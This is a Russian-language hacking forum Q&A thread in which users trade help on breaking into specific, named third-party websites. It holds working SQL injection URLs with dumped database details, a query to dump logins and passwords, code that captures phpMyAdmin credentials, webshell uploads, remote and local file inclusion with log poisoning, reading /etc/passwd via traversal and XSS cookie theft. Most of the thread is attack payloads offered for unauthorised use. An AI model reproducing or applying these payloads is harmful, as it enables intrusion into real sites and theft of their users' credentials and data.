WendM said:
Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки


WSO.

OxoTnik said:
WSO.


Там через консоль? Если да то какую команду вбить?

WendM

если права на чтение есть то без консоли домашняя должна быть видна

можно и через консоль: ls -l -a

jasp3r said:
WendM
если права на чтение есть то без консоли домашняя должна быть видна
можно и через консоль: ls -l -a


права есть, и все я вижу. Суть в том что там много папок, в них папки сайтов, название папки=домен сайта. Так вот, что бы мне руками не шустрить все папки, и не выписывать все домены, я хочу вызвать дерево директорий, потом спарсить названия доменов


jasp3r said:
WendM
можно и через консоль: ls -l -a


только почему то ноль реакции.

P.S Сижу под пользователем Apache.

Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php


PHP:
if (isset($_POST['pma_username']))

{

$get_user=$_POST['pma_username'];

echo$post_user;

}

if (isset($_POST['pma_password']))

{

$get_pass=$_POST['pma_password'];

echo$post_pass;

}

но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так?

WendM said:
Как отослать на снифер пароль введенный в phpmyadmin? Тренируюсь на локалки, для теста добавил в index.php

PHP:
if (isset($_POST['pma_username']))

{

$get_user=$_POST['pma_username'];

echo$post_user;

}

if (isset($_POST['pma_password']))

{

$get_pass=$_POST['pma_password'];

echo$post_pass;

}

но ни чего не выходит, переменные $get_pass $get_user пустые. Что не так?



А если так ?


PHP:
if (isset($_POST['pma_username']))

{

$get_user=$_POST['pma_username'];

echo$get_user;

}

if (isset($_POST['pma_password']))

{

$get_pass=$_POST['pma_password'];

echo$get_pass;

}

$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные $post_pass $post_user - пустые.

BigBear said:
А если так ?

PHP:
if (isset($_POST['pma_username']))

{

$get_user=$_POST['pma_username'];

echo$get_user;

}

if (isset($_POST['pma_password']))

{

$get_pass=$_POST['pma_password'];

echo$get_pass;

}

$get_pass и $get_user как раз не пустые, а вот выводимые на экран данные$post_user $post_pass - пустые.


ой, я тупанул. Просто забыл переименовать когда сюда постил. Т.е $get_pass= $post_pass и $get_user=$post_user.

А так вопрос решен, там в индексе инклуидится common.inc.php, вот в него и прописываем (в самое начало)


PHP:
if (isset($_POST['pma_username']))

{

$get_user=$_POST['pma_username'];

echo$get_user;

}

if (isset($_POST['pma_password']))

{

$get_pass=$_POST['pma_password'];

echo$get_pass;

}

Всем спасибо за внимание

BigBear said:
Права -rw-r--r-- указывают на то, что файл доступен на редактирование только создателю


Странно, залил шел на другой сайт, права теже, но редактирую спокойно любые файлы сайта. В чем фишка ?

На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге

http://myrusland.ru/maps_regions_'.htm

Все попытки раскрутить не приводили к успеху, вроде как всего 1 таблица, хотя я могу ошибаться.

http://myrusland.ru/maps_regions_'and(select*from(select(name_const(ve rsion(),1)),name_const(version(),1))a)and(1)='1+--+.htm

WendM said:
Странно, залил шел на другой сайт, права
теже
, но редактирую спокойно любые файлы сайта. В чем фишка ?
На том сайте где не могу редактировать сижу под пользователем Apache, могу ходить по всем сайтам на хостинге


Элементарно же, Ватсон. Значит apacheне является создателем для того файла, что ты редактируешь. А пользователь на другом сервере - является.

Что-то не могу раскрутить LFI:


Code:
http://www.discuta.ro/forum/forumList.php?view=

MaxFast said:
Что-то не могу раскрутить LFI:

Code:
http://www.discuta.ro/forum/forumList.php?view=



это не LFI, это читалка, но файл перед выводом проходит через loadXML() - который ждет валидного XML а, поэтому фейлит парсинг, и вам ничего не выводит

MaxFast

Если интересно то есть скуль в пост запросе


POST /forum/phrame.php?action=displayPostList&pageNumber[]=2&threadId=-234234[Sql]
Host: www.discuta.ro
fwd=%3e




User: tlsforum@localhost
Version: 5.1.61-log
DB: forum

На какой сервис можно временно залить шелл, чтобы стянуть его оттуда на нужный сайт?

qq6ka, народ, я.диск, гугл драйв etc...

VY_CMa said:
qq6ka
, народ, я.диск, гугл драйв etc...


народ капчу просит распознавать.

через wget же не получится тогда?

Я имел в виду сайт на народе.

VY_CMa said:
Я имел в виду сайт на народе.


Понял, спасибо. И ещё, на каком сайте можно закодировать текс, чтоб мускуль скушал?

qq6ka, смотря как кодировать, я юзаю собственный

Помогите как инклудить при данной ошибке?

Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

Warning: include() [function.include]: Failed opening 'G.php' for inclusion (include_path='.:') in /var/www/x/x/x/x/x/x/index.php on line 71

Ссылка такого вида:

http://site.ru/dir/index.php?print&id=669

изменяю '669' выдазит уже mysql ошибка ,а мне нужен очень инклуд

blesse, if allow_url_fopen != Off:

http://site.ru/dir/index.php?print&id=http://mysite.com/shell

Skofield said:
blesse
, if
allow_url_fopen
!= Off:
http://site.ru/dir/index.php?print&id=http://mysite.com/shell


вы думаете ,что я настолько глуп?

я же говорю

изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд.

Может ошибка гдето в скпите и вообще нету инклуда тут?

2 o3,14um:

mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl)

2 blesse:

Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.

Cennarios

2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет

Konqi said:
Cennarios
2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет



Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.

Нешел другой инклуд:

http://site/patch/index.php?X=G&F=blalalal

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37

как я понимаю тоже бесполезный?

при изменеии переменной в ошибке оставется часть namesutf8-

Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00

вылазит:

Warning: require(namesutf8-../../../../../../../../etc/passwd)

Античат, помоги.

Есть некая страница.

page.php?text=Тест

этот text параметр выводится на странице. XSS работает, пробовал alert.

Фильтрации нет вообще видимо.

Можно ли как то вставить туда php код?

Manok said:
Античат, помоги.
Есть некая страница.
page.php?text=Тест
этот text параметр выводится на странице. XSS работает, пробовал alert.
Фильтрации нет вообще видимо.
Можно ли как то вставить туда php код?


Нет.

Жаль. А что можно с этого полезного поиметь? Страница общедоступна.

Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?

http://www.dialogas.com/senoji/index.php?lng=lt&content=pages&page_id=-52+union+select+table_name+from+information_schema .tables+--+

не сталкивался раньше с таким, фильтруется from, можно как-то обойти?

Manok said:
Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?


Можно. На форуме много статей про использование XSS.

Нашел скулю на сайте Артека, в базе не нашел паролей. Админка расположнена по адресу artek.org/admin/ но там базовая авторизация. Можно ли получить что то полезное со скули? Как можно зайти в админку?

RColor said:
Можно ли получить что то полезное со скули?


Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.

Есть такой код:


PHP:
$res=mysql_query("SELECT username FROM users WHERE username='$u tente' AND id<>".max(0,$_POST["uid"]));

Заинтересовало меня то, что в функцию max() передается не фильтрованное значение.

Так вот, если передать в max() строку - она представляется как 0, сравнится с первым и большее возвратится. Прикол в том, что max возвращает строку. Тоесть:

max(-1,'string) возвратит string, т.к. -1

Не получается залить шелл через mysql. Права рутовые. Подключась навикатом.

Делаю так:


Code:
SELECT '' INTO OUTFILE '/home/l2/public_html/images/sh.php'

Не получается.

ищи папку врайтабельную на запись

Ups said:
Не получается залить шелл через mysql. Права рутовые. Подключась навикатом.
Делаю так:

Code:
SELECT '' INTO OUTFILE '/home/l2/public_html/images/sh.php'

Не получается.


Учите матчасть! root пользователь mysql в данном случае обеспечивает FILE_PRIV. root mysql никакого отношения к system user ROOT не имеет. Все операции от пользователя под которым запущен mysql сервер (обычно mysql системный юзер). Как вам и советуют - надо искать директории на которые выставлены права на запись для кого-либо помимо овнера.

Помогите, Zenmap пишет, что ос linux 2.6.15-2.6.26 с точностью 96%, и что на 80 порту находится microsoft iis httpd 6.0. По моим представлениям microsoft iis должен стоять на windows, да и регистр букв в адресе роли не играет. Значит ли это что там windows, и как можно точно определить версию ос? Можно ли верить что там microsoft iis httpd 6.0? Какие на него есть эксплойты? Посоветуйте пожалуйста, чем лучше просканировать хост?

Есть freebsd, в php отключены popen,exec,system,passthru,proc_open,shell_exec.

Делал в отдельной папке, чмод 755 на скрипт, папка тоже 755, htaccess с текстом


Code:
Options +ExecCGI
AddHandler cgi-script cgi pl

При обращении к скрипту через браузер получаю исходный код.

Может, неверно указывал пути к перлу, но проверить это не могу, т.к. open_base_dir, пробовал самые распространенные.

Как можно запустить перл скрипт из браузера?

stan_q said:
Есть freebsd, в php отключены popen,exec,system,passthru,proc_open,shell_exec.
Делал в отдельной папке, чмод 755 на скрипт, папка тоже 755, htaccess с текстом

Code:
Options +ExecCGI
AddHandler cgi-script cgi pl

При обращении к скрипту через браузер получаю исходный код.
Может, неверно указывал пути к перлу, но проверить это не могу, т.к. open_base_dir, пробовал самые распространенные.
Как можно запустить перл скрипт из браузера?


Возможно там Perl и нет, если .htaccess действителен, то вам нужно указать путь какой либо исполняемого файла, к примеру /usr/bin/python, так-же может иметься возможность написать приложение на C++.

Приветствую! Есть слепая скуля на MS SQL Server'е... можно ли как-нить читать файлики на сервере, юзая блинд? права SYSTEM

Ошибки следующего вида при подставлении ' в строку

http://i.imgur.com/ZErAT.png

Но когда перебираю +UNION+SELECT+1,2,..+--+

Ничего не исчезает!

До 30ти перебирал.

Как раскрутить эту sql?

foma9999 said:
Ошибки следующего вида при подставлении ' в строку
http://i.imgur.com/ZErAT.png
Но когда перебираю +UNION+SELECT+1,2,..+--+
Ничего не исчезает!
До 30ти перебирал.
Как раскрутить эту sql?


пантамимой не занимаемся, скиньте URL или не задавайте подобные вопросы на которые просто не возможно ответить

foma9999,


Code:
http://www.advis.ru/gotovye-issledovaniya/page.php?ID=-20839'+union+select+1,group_concat(login,0x3a,pass word),3,4,5,6,7,8,9,0,11,concat_ws(0x3a,version(), user(),database()),13,14,15,16,17,18,19,20,21,22+f rom+users--+

M_script said:
Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.


Спасибо тебе за дружеский совет ,

но я интересуюсь не для нажива ради, а только с целью научиться что делать в подобных ситуациях, в данном случае Артек подвернулся под руку...

phpmyadmin 3.3.8

Зашел на /pma/setup/index.php создал сервер с именем alert("like this")

http://s018.radikal.ru/i514/1209/05/4d8036ae9649.jpg

Подскажите плиз как можно это использовать?

залил на серв wso и на тебе:

Warning: gzinflate() has been disabled for security reasons in путь : regexp code on line 1

первый раз с таким сталкиваюсь , я так понял эта функция отключена(гуглил ,но не понял насколько эта функция критична для вебшелла) какой тогда шелл попробывать?

blesse любой где не используется эта функция, wso не пакованный, c99, c100, r57, Safe0ver и тд..

LelouchMe said:
Ребят, а что тут? http://grandis.me/index.php?f=stat&act=pk&sid=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+--+


это не скуля

не подскажите,
msxml4.dll error '80004005'
A string literal was not closed.
/test3.asp, line 26
это SQL inj или просто стандартный ответ сервера на ошибочный ввод? В уязвимый параметр передаю "


это xpath inj, можно выдергивать данные из XML файлов... достаточно бесполезная уязвимость, т к вся более-менее "нужная" инфа хранится все-таки в бд....

A string literal was not closed.


Кавычка не закрыта, где-то там.

Хотя, это смахивает на code-inj раз он интерпретирует кавычку.

Не могу раскрутить. Сервер выдает:


Code:
Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT article_id, title, author, add_time, file_url, open_type, content FROM `d2okcom_gh0P72s`.`d2ok_article` WHERE is_open = 1 AND cat_id IN ('14') ORDER BY article_type DESC, add_time DESC LIMIT -10, 10 ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1 ) [3] => Array ( [errno] => 1064 ) )

С помощью union select не смог.

Скуля вида site.com/bla.php?id=[SQLI]17

А так ошибку не выдает site.com/bla.php?id=17[SQLI]

Подозреваю, что тут инъекция в limit.

Тыц (https://antichat.live/showthread.php/t/7118/)

Попробуй id=17,10+union.....+--+

Warning: Cookie names can not contain any of the following '=,; \t\r\n\013\014' in /home/www/web/CAPTCHA/_init.php on line 25



только раскрытие путей?

DeepXhadow said:
только раскрытие путей?


Скорее всего - да.

Привет там,

Есть кто-нибудь, кто знает, как использовать этот подвиг?

http://3dwebdesign.org/forum/index.php?showtopic=1113

http://cancer.eur[google]olab.ua/blogs/view/post/368'

Никак не могу раскрутить...ваше мнение ?

Always


Code:
http://cancer.eurolab.ua/blogs/view/post/368+and(select+1+from(select+count(*),concat((sele ct+substr(concat_ws(0x3a,version(),user(),database ()),1,100)),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--+

http://www.mamashkam.ru/users/tennisvip/blog/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and(1)='1 --.html

Версию вывел, но больше ничего...

По возможности подскажите.

Always said:
http://www.mamashkam.ru/users/tennisvip/blog/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and(1)='1 --.html
Версию вывел, но больше ничего...
По возможности подскажите.




Code:
http://www.mamashkam.ru/users/tennisvip/blog/1'and(extractvalue(1,concat(0x3a,concat_ws(0x3a,da tabase(),user(),version()))))and(1)='1--.html

XPATH syntax error: ':mama:mama@localhost:5.5.25'

UPD В chrome ошибка есть, в Firefox нет, учтите!

http://www.cellapplications.com/product_desc.php?id=-1919'+union+select+1,2,3,4,5,6+--+

как быть?

OxoTnik said:
как вариант 5.1.49-1ubuntu8
Пробелы убрать


ну, что можно раскрутить как слепую, я знаю

а если как обычную, ни как?

OxoTnik said:
Нука поподробнее расскажи :ebak:


я имел ввиду через ерор базед

опечатался, с кем не бывает)

меня больше интересует, раскрутить как обычную...

smirk said:
я имел ввиду через ерор базед
опечатался, с кем не бывает)
меня больше интересует, раскрутить как обычную...


Не сочти за трололо - но "как обычную" - это как ??

Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?

Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?

В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?

З.Ы. для люителей шаблонно мыслить


Code:
_ttp://www.cellapplications.com/product_desc.php?id=1919'+and+substring((@@version ),1,1)='5

Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?


PHP:

$page=$_GET['page'];

$page=preg_replace('/[\x80-\xFF]/','?',$page);

$page=trim(htmlspecialchars(str_replace(array("\r\n","\r","\0"), array("\n","\n",''),$page),ENT_QUOTES,'UTF-8'));

$pageClass='Show'.ucwords($page).'Page';

if(!file_exists('test/class.'.$pageClass.'.php')) {

exit('error');

}

// Added Autoload in feature Versions

require('test/class.'.$pageClass.'.php');



П.с волнует вопрос если можно обрезать то что идёт ДО переменной

INSERT INTO table1 (user_from,
user_to,message
,edittime) VALUES('10',
'10','mess'
,'1347608937')


Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?

Basters said:
Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?



а какой ты результат хочешь?

HAXTA4OK said:
а какой ты результат хочешь?


Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...

Basters said:
Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...


http://www.mysql.ru/docs/man/SELECT.html

INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')

Здравствуйте нашел Directory Traversal

http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался

kacergei said:
Здравствуйте нашел Directory Traversal
http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался


Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.

winstrool said:
Вопервых можешь поискать логи ошибок, спровацировать ошибку вставив в нее свой пхп код и проинклудить, во вторых если проинклудидится такая херь /proc/self/environ, то можешь также в хидерах отправить запрос с уже твоим пхп кодом, например в название браузера.


/proc/self/environ не инклудится, какие есть еще варианты?

И Как найти логи ошибок? (напиши в личку аську)

kacergei said:
И Как найти логи ошибок?


Брутом по списку наиболее распространенных вариантов.

Если сайт на хостинге, читаешь инструкции и факи хостера или регаешь там же свой сайт, чтобы узнать стандартные имена лог-файлов.

kacergei said:
/proc/self/environ не инклудится, какие есть еще варианты?
И Как найти логи ошибок? (напиши в личку аську)


Тема for you - /thread324564.html (https://antichat.live/threads/324564/).

Еще есть вариант с ftp логами.

Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:


Code:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000

Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();

В этот момент у меня уже стоит user-agent:

Что делаю не так?

Zed0x said:
Есть сайт LFI, логи Apache не нашел. Решил поискать в /proc. Вспомнил, что путь до логов знать не обязательно, а можно залится через символическую ссылку к этим самым логам, но надо знать идентификатор процесса и ярлык соответствующему файлу. Соответственно полез я в /proc/self/status:

Code:
Name: apache State: R (running) SleepAVG: 97% Tgid: 28857 Pid: 28857 PPid: 7349 TracerPid: 0 Uid: 65534 65534 65534 65534 Gid: 65534 65534 65534 65534 FDSize: 32 Groups: 65534 VmSize: 19128 kB VmLck: 0 kB VmRSS: 8676 kB VmData: 2440 kB VmStk: 84 kB VmExe: 488 kB VmLib: 13636 kB VmPTE: 24 kB Threads: 1 SigQ: 0/2048 SigPnd: 0000000000000000 ShdPnd: 0000000000000000 SigBlk: 0000000080000000 SigIgn: 0000000000001200 SigCgt: 00000003844064eb CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000

Вижу PID: 28857. Пытаюсь залится: http://ozrics.dyndns.info/modules/page.php?id=../../../proc/28857/fd/2&cmd=phpinfo();
В этот момент у меня
уже
стоит user-agent:
Что делаю не так?


попробуй сначала вывести phpinfo() из user-agent минуя get переменную, возможно что-то напутал с PID.

помогите докрутить блинд скулю..


www.informatoreagario.it/clickthrough.asp?IDbanner=-3681 OR (ascii(substring((system_user),1,1)) > 0)


сама уязвимость

написал скриптик (код позаимствовал из тэмпера) для версии и текучей БД:

MS SQL 2005 и база 'InformatoreAgrario'

терь хочу выбрать таблицы в текщей базе, но почему-то не получается =/


-3681 OR (ascii(substring((SELECT count(name) FROM InformatoreAgrario..sysobjects),1,1)) > 0)


havji на эту багу вообще никак не реагирует, видимо работать с OR ее не научили

Pangolin PRO отлично справляется с MSSQL инъекциями.

Version = Microsoft SQL Server 2005 - 9.00.5000.00 (Intel X86) Dec 10 2010 10:56:29 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

User= webuser

Database = InformatoreAgrario

Но в твоём случае извлечению табличек мешает WAF.

[CODE]
Code:
http://www.informatoreagrario.it/clickthrough.asp?IDbanner=244%09and%09(select%09le n(cast(count(1)%09as%09varchar(10)))%09from%09[informatoreagrario]..[sysobjects]%09where%09xtype=char(85)%09and%09status>0)>88%09and%091

Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в

/var/www/htdocs/images/ ?

blesse said:
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?

blesse said:
Напишите плз пхп код который скачает файл с http://x/x.php и поместит его в
/var/www/htdocs/images/ ?



В случаях ,если IPTABLES strict's or allow_url_fopen=Off ->

file_put_contents('/path/shell.php',$_SERVE['HTTP_USER_AGENT']);

or

file_put_contents('/path/shell.php',$_POST['data']);

Почему то не могу раскрутить

http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'

даже Havij не справился

посмотрите

Hapk said:
Почему то не могу раскрутить
http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780'
даже Havij не справился
посмотрите


там защита он инъекций, фильтруется union selectt, дальше не смотрел

и что больше нечего нельзя сделать?

Hapk said:
и что больше нечего нельзя сделать?


http://studyguide.ru/labourexchange.php?act=view&sv=va_vacancy&id=780+and+1=1+group+by+40+--+

TRUE

Ну полей 40 - с этим бы будем считать, что определились...

Теперь надо обойти WAF

UPDATE Фильтруются скобки. Думаю - можешь забить на этот сайт...

Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?

Пример.

http://195.112.109.83/

http://79.170.27.106/

Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.

LFI уязвимость

include $_GET['include_path'] . '/include/some/file.php';

Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?

pvitalik80 said:
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?


Ну если я правильно то понял, то возможно RFI c условиями, что

1) allow_url_include = On

2) На своём сервере создать путь /include/some/file.php и в качестве file.php разместить шелл-код.

Вариант событий второй...

Юзать дальше LFI и добраться до любых логов при использовании альтернативы нулл-байта, например 4096 слэшей, почитать об этом можно тут (https://antichat.live/threads/98525/)

Sat-hacker said:
Подскажите пожалуйста что прописать в google чтоб он выдал результаты на который требуеться авторизация как .htaccess?
Пример.
http://195.112.109.83/
http://79.170.27.106/
Незнал где задать вопрос написал здесь,если не правильно просьба модераторов переместить.Спасибо.


Google не индексирует такие страницы.


pvitalik80 said:
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?


Всё достаточно просто.

Если есть возможность проинклудить файл с другого сервера:

http://site.com/shell.php?/include/some/file.php

Если такой возможности нет, то стоит обратить в первую очередь внимание на работу других функций с $_GET['include_path'], а они есть т.к. Null-байт вырезаеться и на _/thread98525.html

XAMEHA said:
Google не индексирует такие страницы.


Интересно как этот сервис находит.

http://www.shodanhq.com/

Sat-hacker said:
Интересно как этот сервис находит.
http://www.shodanhq.com/


ну вот и используйте API этого сервиса

http://docs.shodanhq.com/

Sat-hacker said:
Интересно как этот сервис находит.
http://www.shodanhq.com/


Думаю, по коду 401 - Unauthorized

pvitalik80 said:
LFI уязвимость
include $_GET['include_path'] . '/include/some/file.php';
Нулл-символ экранируется. Версия PHP 5.2.17. Реально ли что-то с этим с делать?


Возможности RFI нету, проверил альтернативы по ссылкам, тоже не получилось. Теперь думаю a LFI ли это.

Такая ситуация, я открываю index.php?include_path=http://google.com скрипт подвисает и вылетает по таймауту. Если делают так index.php?include_path=somesome.php ничего не происходит.

На этом же сервере, но с другого акка, проверил include "http://google.com"; скрипт не подвис, а просто выдал ошибку "URL file-access is disabled in the server configuration".

Вопрос, так что же все-таки творится в скрипте, почему он подвисает?

скинь в ЛС ссылку,посмотрю,возможно помогу.

http://neoncolor.ru/catalog/?gr=18'

http://xao.ru/review'

http://oring.com.ua

не могу раскрутить хелп?)

m00c0w said:

justonline said:
http://neoncolor.ru/catalog/?gr=18'


не могу раскрутить google.com. хелп?


" if author else f"

m00c0w said:

justonline said:
http://neoncolor.ru/catalog/?gr=18'


не могу раскрутить google.com. хелп?


Скуль есть

http://neoncolor.ru/catalog/?gr=(18)and(10)=10

http://neoncolor.ru/catalog/?gr=(18)and(10)=11

Pirotexnik said:
Скуль есть
http://neoncolor.ru/catalog/?gr=(18)and(10)=10
http://neoncolor.ru/catalog/?gr=(18)and(10)=11


однако моих скромных знаний не хватило.

там дб, скорее всего, не мускул.

По крайней мере sleep() она не знает.

В общем проинжектится, думаю, можно, но как я не знаю.

Pirotexnik said:
там дб, скорее всего, не мускул.
По крайней мере sleep() она не знает.


зато connection_id() знает, так что мускул

http://neoncolor.ru/catalog/?gr=18+and+connection_id()=connection_id()

PHP:
if (is_file($_GET['cfg']) anddirname($_GET['cfg'])=='.')

$_SESSION['configfile']=$_GET['cfg'];

else

$_SESSION['configfile']="cryptographp.cfg.php";

include($_SESSION['configfile']);



Реально ли это как-то раскрутить?

justonline said:
http://neoncolor.ru/catalog/?gr=18'


Фильтруется вообще куча всего, проще перечислить что не фильтруется =)

(substringкстати фильтруется тоже, чего не скажешь о substr)

Но тем не менее...

Для вывода версии юзал так


Code:
http://neoncolor.ru/catalog/?s=2&gr=642+and+ascii(lower(substr(@@version,1,1)))=53

Ну или более экзотический вариант


Code:
ttp://neoncolor.ru/catalog/?s=2&gr=642+and+right(left(@@version,1),1)=5

Version = 5.0.77

@@user и user() фильтруется, точно также обстоит дело и с именами БД.


M_script said:
зато connection_id() знает, так что мускул
http://neoncolor.ru/catalog/?gr=18+and+connection_id()=connection_id()


Абсолютно солидарен с товарищем - перед слепой инъекцией не поленитесь проверить с какой СУБД имеем дело, например руководствуясь уникальными функциями каждой СУБД этого поста (https://rdot.org/forum/showpost.php?p=695&postcount=1)


justonline said:
http://xao.ru/review'


тут дело обстоит намного проще - фильтруется пробелы - юзай /**/


Code:
http://xao.ru/review'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1

Duplicate entry '5.0.77-log' for key 1

User = 'cl61392_xaoruweb@localhost'

Database = 'cl61392_xaoruweb'


justonline said:
http://oring.com.ua


Прикольная скуля, не сразу додумался в каком параметре искать... Хоть бы указал...

Ну вот держи вектор атаки


Code:
http://oring.com.ua/products/uponor-wirsbo/truba1.php'/**/OR/**/(SELECT/**/COUNT(*)/**/FROM/**/(SELECT/**/1/**/UNION/**/SELECT/**/2/**/UNION/**/SELECT/**/3)x/**/GROUP/**/BY/**/MID(VERSION(),FLOOR(RAND(0)*2),64))/**/and/**/1='1

Duplicate entry '4.1.21-standard' for key 1

Version = 4.1.21-standard

User = oring_com_ua@localhost

Database = oring_com_ua

Дальше сам справишься?)

Небольшое дополнение. Вынесу в отдельный пост, а то предыдущий длиннопост и так сложен для восприятия.

Надеюсь, модераторы не осерчают... =)


justonline said:
http://neoncolor.ru/catalog/?gr=18


Не давала покоя скуля, была идея проверить на магические кавычки, вдруг получится шелл залить...


Code:
http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF('123'=123,1,0) FALSE

http://neoncolor.ru/catalog/?s=2&gr=642+and+1=IF(123=123,1,0) TRUE

Как видишь, облом.

Так что, ИМХО, на сайт можно забить...

Что можно выжать из этого ?


Code:
http://kb.8day.ru/objects.php?serv=1&it=W'

Rifes said:
Что можно выжать из этого ?

Code:
http://kb.8day.ru/objects.php?serv=1&it=W'



Не более чем раскрытие путей. Инъекции я тут не увидел.

pvitalik80 said:

PHP:
if (is_file($_GET['cfg']) anddirname($_GET['cfg'])=='.')

$_SESSION['configfile']=$_GET['cfg'];

else

$_SESSION['configfile']="cryptographp.cfg.php";

include($_SESSION['configfile']);



Реально ли это как-то раскрутить?


Скорее нет чем да, инклудить можно только из текущей папки.

Code:
